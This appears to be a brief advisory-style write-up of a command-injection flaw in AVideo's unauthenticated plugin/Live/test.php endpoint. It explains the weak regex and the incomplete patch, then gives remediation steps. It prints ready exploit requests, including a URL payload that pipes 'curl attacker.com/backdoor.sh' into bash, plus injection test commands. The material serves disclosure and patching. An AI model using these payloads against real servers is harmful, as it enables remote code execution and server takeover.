Listen to this Post
How the mentioned CVE works:
The vulnerability exists in AVideo’s plugin/Live/test.php endpoint.
An incomplete fix added escapeshellarg() only for the wget code path.
The URL validation uses preg_match(“/^http/”, $url) which is weak.
This regex matches any string starting with “http”, e.g., “httpevil.com”.
It does not require “://” and does not block shell metacharacters.
The vulnerable wget() function builds a command: wget –tries=1 {$url} -O {$filename} –no-check-certificate.
Neither $url nor $filename is sanitized with escapeshellarg().
An attacker can inject semicolons, backticks, or $() into the URL.
Payload like “http://x; id > /tmp/pwned; echo” passes the weak regex.
The semicolon terminates the wget URL and executes arbitrary commands.
The fix added escapeshellarg() for wget but left file_get_contents() and curl() unsanitized.
Both alternative code paths still process the same user-supplied URL.
They follow redirects and lack any shell escaping.
The test.php endpoint does not require authentication (User::isAdmin() missing).
Thus an unauthenticated attacker can achieve remote code execution.
The incomplete patch creates a false sense of security while other vectors remain open.
No proper URL scheme validation or allowlist is applied globally.
The vulnerability allows full server compromise via command injection.
dailycve form:
Platform: AVideo
Version: < commit1e6cf03e93b5
Vulnerability: Command Injection
Severity: Critical
date: 2026-04-14
Prediction: 2026-04-20
What Undercode Say:
Check vulnerable regex behavior
echo "httpevil.com" | grep -E '^http'
Simulate injection command
curl -k "https://target/plugin/Live/test.php?url=http://x; id > /tmp/pwned; echo"
Verify wget unsanitized path (manual test)
python3 -c "import re; print(re.match(r'^http', 'http://x; id'))"
List alternative vulnerable functions (file_get_contents)
php -r "echo file_get_contents('http://evil.com|whoami');"
Exploit:
Send HTTP GET request to /plugin/Live/test.php with parameter `url` containing shell metacharacters. Example: http://target/plugin/Live/test.php?url=http://x; curl attacker.com/backdoor.sh | bash; echo. No authentication required. The weak regex accepts the payload, and wget (or fallback file_get_contents/curl) executes the injected command on the server.
Protection from this CVE:
Apply commit 1e6cf03e93b5 or later. Additionally, manually patch test.php: use escapeshellarg() on all user inputs in wget, curl, and file_get_contents paths. Strengthen URL regex to `^https?://` and reject shell metacharacters. Enforce authentication (User::isAdmin()) for test.php. Disable test.php in production if not needed.
Impact:
Unauthenticated remote code execution leading to full server compromise. Attacker can read database credentials, install backdoors, pivot to internal networks, and take complete control of the AVideo server.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

